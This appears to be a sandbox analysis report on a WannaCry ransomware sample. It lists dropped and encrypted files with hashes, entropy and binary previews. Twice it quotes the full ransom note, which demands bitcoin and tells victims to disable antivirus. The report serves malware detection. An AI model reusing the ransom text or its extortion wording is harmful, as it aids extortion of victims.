                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):516712
                                Entropy (8bit):7.999587931693368
                                Encrypted:true
                                SSDEEP:12288:+fjtxPusI/Novbz4jhREsuZ93gGjkbGK5frqwXVAUSKNuJzceiU:+f7usxvbQGf93djYGErqAi3xJ9iU
                                MD5:4379E8A892DFDF0132DBD460F3DA2DC0
                                SHA1:E677DB57DB795ADDFC59863F14929A15FA9890BA
                                SHA-256:2832B29DEFA7930A8D5FEF300B6C61AE5167D75CCCB1A5AE4BD5A363483474E0
                                SHA-512:7648C040237CEA8926A4AAA5EC07B5E1BEC7F7D83A2B1BFCA689AE3F2D667F879818C2A5832CEAA3B7BFB7A7BAFA82CE0B3AB72CDF6B426930D754BC25CF162D
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....p....... 3.J8...0.3.<Z7......s....a..E..C..W..."..s.....Tx.e.UL....{.S~2n..mg.F.&m.s.qp.1.J..Y.w0...o.;.8Y..d.r../...Bq4&;.l.+..XG..|...)....O]E..*am.%.K..pW..E.1XN3....n.@$H....Q.....3..\.ho...kC....}/.......G..T..H.!._"...Ox4..........O..wI.:....H.......(,.....!.%l.R..*.N}..{x.-.B.l/..1.BP[.'R..|....Y+V.U.u..-!]b....R...0bb.Hr....U...\.~..-..h....t%...2I...D.g..S.c..%..C.,..gm.. l.I........l."..8..b...ql....-t.3.;....GJm.>B..hF.9.......DeT...Ef..@u....$........+xsL.o.q......&.@.T..\.n..R.ek...>.c..a...a.Y.....#V...j.yv.G....].3ht..z.b.C...z.......j..5.....6 ............|.?L......8T..<...F.8..Y..].....W.e...Yo.&l..D..;.....A.d.N-......./.`.}w..E..e.0O.....}.>q.!.B.....VG?.....L..J...R...P\...KaH%.<..2P`.2........F-..o..2n8.."....E*Q..{Py..b.Y._WM.k./..D...h..^.4D}..ve1.F'...:...T.....p..]....y...%K`.....~.;..n=.*I...\...;a.D.. 8....].p-.".O1.Ws.=..8...i.o...G~...[...x.....4My.u.r*....l.3..2...!"...../..|~...+WSK|.9&..C...8...

                                C:\ProgramData\Microsoft\Windows\Caches\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\ProgramData\Microsoft\Windows\Caches\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16664
                                Entropy (8bit):7.989507536372097
                                Encrypted:false
                                SSDEEP:384:bckPcxNE+y5w8WbJkZIhPTRIgp28PVQZK2Awy5Z:YkUxa+8w8OZBR7pdqUD
                                MD5:AFD6DA67BF3E239E87AE7DC685A2B17D
                                SHA1:856AA374886FF54976E54681FA365681475E7BCF
                                SHA-256:10ED5054B9131068E03E58A8B6CD28344E2A4B1F539ED46D70A9F97875B87C00
                                SHA-512:584DF1AA58097143C217F0907BFE24BA5B9CBAE63FC8CFEC82E64B49817454F43BFAC619B97314214A9E62849C573DD9F2244FB89E3CE7378EF61C68E7F3CC8C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....{.....zo...R....Q..`.iB.../7d....*..5......4........x.*.....v....~E\:...Z&k.w...Z..J.n.I.aC.e.{VBH`.#.js..``](.1#...^.w.F......IU.(...5.L......nl..U...?.1mS...O....8.&R7.go...n"..: &fq..=.~.U0t.....U.4...6..yzU...!/....{..!].y...A..P ..........@.......$..I..C.Quw.A...p$.Hl}=....-{|=MV>........`...<..m3......6?=bP.t..O........|6....i.....-M.MM.2n.h.E[.P..?.p..;.u...z.._?N?...:tm..7h...).......w....p..`...N#...8.f.=.\.=..KL+Jx.p....X...s....4.Tb./Bw...+...@...Lc..m*.4..o.?+.C......u...u./.h.a.u.HO.g....\7f..Ax..k..P.h. c>{jm~/...<..].tw....GK..R.i.s......Y.D.c....P.C...f..T...Gh.n...Tyc.H..@I..v2...............O4......R...t...q.1..b.Y....x.*vQ.p....J..E$^;....C@..Y.....|gU.K....C]....^..|T^..#F/a.Y8.....'.....vyM.^.9..$.}.A.B.4...p....8L.W..2.[.`1..=5.......\@6.}..7,.......F..]....o..A..v.....A............u.5.uR..*,..4.k..m?.w..Ej...s.\.....[...!..(.pSz......:........4.....e.R....e.1kZ&.1..M1.{.....nL...s.(.....j..jN..yt

                                C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296168
                                Entropy (8bit):7.999421558718213
                                Encrypted:true
                                SSDEEP:6144:x7FELKm9YM4LIRizDgL774WRbhfSI/H+zG3cw8XknrH0uGOxCu:jEl9YysApbhRS0nr/GgCu
                                MD5:BD11B72C279125EC902A5C1243C82005
                                SHA1:0AE111D972C480E7A2CE2FD78702EFEFD5D6BCA4
                                SHA-256:7EAD220502EDB8C3E2A641F721AFDADD7B1D974161A86076766993537387A105
                                SHA-512:47832BF6B6DB87D7172034AF1F9E038340BC2730DFEDF6F0C45D1F84ECD7B8A81D48C3F0CD3B1C87463CA88FB09BAAA258BEFCE1127BC7EEE6C1FB9087406F92
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....IiL....w3j!~tUHn..bF....Y.`Q^w........a...*....UQ..>...o.~..O.2L.M.h*.p.*...FY...2 ...(.D..P....E.W..<.3.\....q..k...dl{.^Y:...d.XH.J.....J....#-.....Y..|i=.~..Q..1%c........0..{AV....o.".$@.L...mrFF.....q.*..)...O.U....I...O5.SA-..].l............n<H.%.R.V.>..0..y.e.._.@.O9K...#..\.#....8K.&.-.....4....hV.|3.......ql.E..}.O........Cv..Z..?.oJ.%...cP.t.3.-0svN..H..!.....y.......r'.......&w..[\..st...6|.y..P6M..........l......D....j....O.d..[.g..8.Uucb..'e.....(0.........@..Q.,..,.....>I..%Y,..;z.;..'8bf+Q..b0}..$!.WO>V.o...1.G......W....y...kV......i...J......5.8....B.L.VQ.<{.R.x" ...h..d...m.b7...W./. ..R..:....X.H..:'..s..r.)......F4.......mS....Z.._..r....e..... P..&.4|.EE.....k..S| .....Wd....Q:.H....5s...F)..pB.xD.....M.`H.5......c;.!...n=..;Am1.....&.U.2..B.|....4.....+[_..W...O.h.Q......E..YK@.....&_gKw............T.. ._.c..!\|.>w.L..K.U...W.:...j;XK....X^....-)/d...<..t.*..&.0..+.bF.K..2.h.f}.....W...9v.

                                C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296392
                                Entropy (8bit):7.999352668087261
                                Encrypted:true
                                SSDEEP:6144:B8sTitjP5rguHBJWKaDF/iO+HpGHwAmiVeOC7dzCCtpP6fE:B8yidRsuhJWAIeOOt3l
                                MD5:E369C0724646C7E74817B626FCC5A1E7
                                SHA1:D2E7E8D27061DEAF9F634FFB3F03A6D32BB610D2
                                SHA-256:33D2718FAB27634DF66B1F199ED8C15221B07CFEDA5E13CE491428778C98B3CC
                                SHA-512:67C5D4D6E29EEE0736043E58971E6396D4AF45AB9988F525CD25210CB8BBB2719BE6775892880EC549843EBC0CE1FDB66ACFA8DF0DC0105422C9780AB8E32630
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....a...........Z+...4...$.?... ..z'....Tp..=..\.....*.x....#lK1&.../Y...q-zCcy!....x.......<h...C.l..L...zl...V3..k.......O0...t...7.x-JQ..[.r....*....|.M...y.....n.JPb/.W{E.......<....9>..h..$.5..n*.+*..u1gQ1i|...srL.Z>x...Sw.nxa..9.......E...............}..q..fl..i.?.i?.|..!,. d..+.9..v...*)o.4.2...$K3...F....%LKRgO~En..PI.Z..oZt..K.`..x .KR.y .&.p...;y.Pz...L...d..s$.i...j......k...T.......'>t.e>6..2...D...OI..y.4.+[Em.\..m..%z.nf.........&.I.XU.^.....@.|}.Sk...#.......W....."..t..Y.._........#...A.D.}..e#...Ir...R...L......]!w..n.sH.Tb....?11`..-...q]...l.rz...8B.....g...J..mV..m.m..u.N...VM.N..(cI2......~.Fa._..:E.............a...:.....c.......Td.q..U..S4..e...Q..e.|.#B..[..Z9R">.../...@.W>...y..h...DE.....k..|t.....]k..o.N..j....R....V+...../...X...l.oB....p@.....+.aI.}..D[?.....C...{....".k..I..F..e....P3@i.`..x.......#..@n.[..."Q.g..J.....iP..R+.E....xTM1.zM.....IW+r.r.I.a...c..vX..!.].!..G.....4..5... f..

                                C:\ProgramData\Microsoft\Windows\Caches\{C4C1099F-F739-440C-87E6-A09DB237D75F}.2.ver0x0000000000000001.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1528
                                Entropy (8bit):7.8559999814732775
                                Encrypted:false
                                SSDEEP:24:bkMa+zejvfgVZDyEeMwP7uOuOoHPskPfj5TcnHKdIbRhbQuwhCsVQ:bkMaAejK1lebEBP7mH0IbRhc/fQ
                                MD5:C4EE926DC7C06AE5CF3BA275F0B0D138
                                SHA1:7F6532ED5E26DA6B35F33A25EC85C14BF23D1C87
                                SHA-256:229FC44F25D839FD642EBF34966136425AC3FB5B74592BF7691046458B825087
                                SHA-512:03B088AB520216218CCC4043CA1B6AB663F5AF96E9CBD5809692AD2469838C01C434DA91CBB258BB38DD3987A6059BCC9498EC138AE5B51D1D9E6B0C23A64FE6
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....of.v.......>S...?.0PX..&m.7...L.......H.:T.F.....!.g/....Q.J....&..{..`.&zD.x.m..M0.ZR...:,...}..e.*..'P&O0.v.dU.&...o..e.....I9.F...!..L...19...J.;+..-.5...?...Sb..A.Q.......J.#...s.........11#.Xrvt..[c'A.....w..XS;..y.AU..E.._.Y.(._..0...yf.2.............f.?1.S..>.'.e.(@5..$....,....Q.r^Vig.c..P..28^...84........<....3....|.....1.@.[7W.J'.}......lV..n..bu.o.C.....[%]e3{...=.Cn..!\...*7..".L.A_......n..........u`.I.~a.......$..*....T7O.@c.%....'h..T#...D...:.f{.S...r.aW...#.B+...._.....mj..$Pw.^^;.z.gZIqr7...^_hs-.G..2......*]I....eeK.).+..M.i..$.....@UL....;..A.&8.M:.8iC..v/....E.....4...WO359..4...).V........%..U.....s.....`O.&f5x.........O.....0..'..dX.zV.Kr.By....~..h.li,.!-.8..Q.BS..}.o.....<.rfok[...Z..E!r......}[.....:tde/\.).N.~K....\.....!..,........e0N.j.......1z......}I.7...q4S..o.....X.uD.+Np..J;.qq....o.u.W..-@...y..1....C......../.....,z....=..^.V..\.U00S.(.3..L.G4sE%&.9.......:..&..Sd....lN....." ....

                                C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):638136
                                Entropy (8bit):7.999682169727389
                                Encrypted:true
                                SSDEEP:12288:8wzTCwCyotgapEXx/TBr6dSh4RMeuOtGRRQJeSb1hSQhIaIOynhns:8wPCwCy8uhZ6E+RMeupR3AhvOG
                                MD5:ABCCDCF6C3A8E4E02E4FAF2126087DEF
                                SHA1:0F83E968B834802B1C4A2563DC711DD385CD4FD1
                                SHA-256:FD20B520952CEA39F859597C5239D56A7E26E263FC870EBD8272518960FB45CA
                                SHA-512:BC019041F60AADB4BDC41906C4AFD54C3B31744F63C88F3281C5625A4ACC9BF29C511EBB877B31CD00FFE4AC66D0E456BBFA9818933DD5138E3AF58CED644F93
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....$!8E..*%T..+S.m.#j.... .....l.34.g.....K.1`..,..@.}...La...Ce^~...4... ..nC......"..........YZX..S.2......YpG".ef#q..f.{.c...f](M.EG....>...(..(.*.xB..cR...W.6.k.c.FdDU...P.F..o...y..]=Xx.;:..6n......c.\....a. &.n..fY_."(.T.p..T|b.75b.^s...5S.................jW.e...x.&...;<.&T!my.*..2...0.. ......DMT.4..15]...RJ.lH.+..Z.(c....Na<O...we.M.....Ny.......[.s...&.co^..........Z..r/7=.....=J=..#T....]...t.W...>.....SM.$.@......`GG^8~.D ..o.Yb......e.E.%c../.w.N.t.PeJ....P.....ny..Pz.5J4#.....i..w.\^...q4....P.S.GB.jwA..a..h../D.o.3....)D..8"...@..:2k..R....=..t....p+i9...;..]..!.s.o.Yfh.F..=.);...g.J.!|..=..*.e..".m.`Y..........Jd........L.. !....0n..!-P8.L.....@.:..w...Z..{;...,..].o.}..F.y3.....`.....s^_.../.~.b.)A.3j....<..29..]..Y.$.0.]5...Q.;.L..7#..|m.[.....>....n..K.r....].aV.......,g..>.,=Ax..PW7.>".[.*...W.B..V...&.p.&..^^.2.hU}?1..g4ST....l......(....}. {.zx..@...*U.Q...PYa.{e.U.|]...9...m...;Y...9}.Y... i...}..:...".

                                C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\jquery-2.1.1.min[1].js.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):84536
                                Entropy (8bit):7.998006341929174
                                Encrypted:true
                                SSDEEP:1536:JgdebyFJHa3tLE3C5ocOvBC5ikAZ/lclhUclF6ZQXSvbj:JBMkLSBC5id/lccclF6ZQXSvX
                                MD5:9D132599CC72B5B6D90016747320CC2C
                                SHA1:C6F32EFFD0B6C133342988F7C886EFA1C45B4232
                                SHA-256:509410A46D5AA2B3799FD3EAD98790DD13259135EC29862A30D07BB6D1ED2AE4
                                SHA-512:98426D8A08545FDE03295DC94F74447E9A2D5808281721B6B3989894E8A3D4D4DADACC6A00400E60A711C48CC4BE084F5E4705DCE7B068EFE9F1DF502C19247E
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....#.]..T=].T..+..d.P.J..5..s..J....d..!0.q.>:.<..y%|....n..y.......8#g].c.Dg..I..oD#+H.a....[.'.\....?...Y.....(+z....k+.P..c..q..2I......e...f.U7.....x.....Fc.)...vV.V..`.O<..<.Z...Mt.Y.%..%Bb....Q.5K.....v....].,M.S#.......Z9......x`k.....I.......2...u.....Q.......l..xa.cM;.]9..;.}../.h...{.n....6,......?\...l.^x..K.......Z..A..b.....Ru.._.YEq.R\...~j.2;.....VC.|c:...$....Yv...,.jq.4...x*$?H$u....$.U.....x....2../.c.+.].._.......$.../...%.....K...(..5.&q..g..\q...$._.mu...1?..`.qVoc.B.;W../B.R...-.>T]j.g.jr"@l.....H...=..CJ.v...K.H.PO>Y..E.Hd](.!.'U[/M\.W. ......T.....R..G...~......Cw..QuO..P.9B.......)...X..l'@4$.....33..o. D ..........*.P..u;.hH7y..s....I.S...{.b.......@E@....\|.l<H..A..0[......Z.4...].j....Bs.i.7v..hb..^...9e.P....U..>*.I^.t0......,S!2............]....1..W.....?M(........A....c~"..Uu...y..i....F..v..{.\..P...?..AI...v.5.o-......q@t..X...h_.)..f..... 8a7........F....[prJQMy..0..?.5.8.Ov

                                C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\kernel-1e468708[1].js.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):289832
                                Entropy (8bit):7.9994543302104
                                Encrypted:true
                                SSDEEP:6144:ZhH6hIY2p/fBi8Lg9wrlye27nUcZuDzjMbEtnf44V7U:3a+Jp/Ji8sIlye27UcZ0jgeQ4e
                                MD5:18AF952D40126A59E4C9DF662C89F073
                                SHA1:7D0E2A8AB8AB59BF7A4B06BDE3751A485F49A209
                                SHA-256:DA45B62B68CA26AE2AD0A8426AC497926A396DF30D5F4F5B4E9B4A1D43CDC5F9
                                SHA-512:156E3CD0050F4531CA947B1092F3921C404A11BE2CDDD53DB50D419C23CF97C1701F18797B7669EFFD945DE9C5E237D3F728618BB0D0B7081A975AF4E80606A8
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....o.&D....6a..q..d..5.9...%._...9.R.....5..{......d..E..b............C.GE|.....=...'......j.s.K...<"....t65..1i....-...j..f.H.3..F.......K......K.1.(....4....!K.....XA.9.q..^.w..Z{...[..2..x.Uu.....`4k.].gJ.3+0{h....&.E.V.P..6.."`|.]...s...`F(.....k........h..@.\..#....e.)QyL.k4.W.1....];..............}3.J..sk.1...F."d..%....5..h....UldT.....~m,.....B.F.. +y....7..Q@.w..,....Uy..1..s..2.y.._..*Bn...%Z(.......e...&..,P]...j.0....T))..{......m...P.y.>Q..Nq..b..x....q.....:G|.RNQ ...;.}lU. >...d.I.|.....V.`'.l.'W..-..H....x..w...Q.a..L..+..W.%...`..j.^....b.-.R..q..o[.}^.,..q......x..!..n..$.....g..0i..?.`..$FP..{.T.5$..F....|=%..C..s......F...S`]....^....z.....R.3..j...b....y.............H...P.<e..k...U_.......g)....6..}i..k0..:.....S......n.e....3"n...?..~..V...w.RM."..,.g\.!'6.m......O.M.L....!.l....;.VR.'c..7^..[...^>*....|.....A.E...~U.\...l[-K..(..../....>Q.n..t..T..$V.h.u#......P._.Y.Df.....D~.l.!9.d....z....9)t..WK[.)...Z..hW5

                                C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\mscc-0.4.2.min[1].js.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4872
                                Entropy (8bit):7.962334394041198
                                Encrypted:false
                                SSDEEP:96:oafGq/Vu2ikzCGhO/NvedQRNZF1SrMH1pAQJx9DHYM/3fu:zfHw2ikzWFW8N9Sk1JJx5Xu
                                MD5:BB6D06F355755E07E5CB1D72EB5BFFD0
                                SHA1:1824B52AF0E8BFB2A09429533230098E72BB9F44
                                SHA-256:6D6654F872B9A1B654F866BBB9747F739449C0A548B8D002151C20BA31571036
                                SHA-512:0471AE3002362A27D7BC07D400429CC3041BD5E39301F77949820539B56A7DB200966B198521336DD613A0B87925453A35677E75BD68C1BA0778F1232EDF12A5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....E1..-.S].r6U.8.am!.{H.....vg.q.....7".o@'f..r......c...Ku.f+t..XT...rmn.....y..3%.....~)N....n.%.F.7..U.y.t.0.....t......._.bE.HQ.. ..'...C.....\ ....v...a....Y..{./a..N......o......LC.]p.<..U.3.....<j.Q,..(.PU.<...#...1.c.I}..#W.V1.gVM}..q.R=..............j.*..YU.(..$.2.....p<eQ.zd.b.....VJ..U..a_.p..;...b..\..... B=}....3v....I.!<....qW`ud.9...9...O$...Ja.....gH.hx..)...U%.`..........@k.qWB..t..P.n..w...d.....Wl.A0.(_.v.6..?KE*..9....t..bc..^R.co@.|g.4..u.............G....4........Y.qu{.d%?..I....Q%.#.....I\......z.V...].(.5.}3Te.r.-.[....`<.<^..Dgg.l..z.Y!e6;.....Gj.C._....3JEuZ...&..&.mq7..@#.c...{.=.s......@....wbC.....OD..L.t.....>..(.=......e.$..53...+{J.N.:..........bl!b....5.._T~..[Q...y]Y.oQ.%^..[=.I|..sNL.p....N....l0B.O..(.0...w.tW.........!.8.b.....=.,0....UU.......,b.V.X....H.m..Zw3Er.X....N.....Tb<j<.H.5 .z......!...m.....l.....17&....W..D..U...xVG....F.+........YIZ.^]e...^.}o.}..r..p(...C.}}.xp

                                C:\Users\user\AppData\Local\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\Users\user\AppData\Local\@WanaDecryptor@.exe

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):245760
                                Entropy (8bit):6.278920408390635
                                Encrypted:false
                                SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                MD5:7BF2B57F2A205768755C07F238FB32CC
                                SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 96%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196552479439416.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.9985587459984195
                                Encrypted:true
                                SSDEEP:3072:l9HlK0QDmmWygJ6pOoLZVL2vOa9aoAScDc1ITlr7U:ldQim3gJ4LilanScUIlU
                                MD5:AA67DD611BE9603A12B8AA6770188F8E
                                SHA1:54A689B97312EB72A7FF43E8A9C924DE869E8E14
                                SHA-256:9CBCAC61524D42DE2314737F49EA148521A6885B29D463D8B5100C694D79EE5A
                                SHA-512:C784FCB02AE384F65AC42564436076FFDF896485D7C740E8408684CEA2F11D3B73C13C4A8951D3A24CD15DC2C288CCA2045A1CC0A578A36026E0CFBE6104830C
                                Malicious:true
                                Reputation:unknown
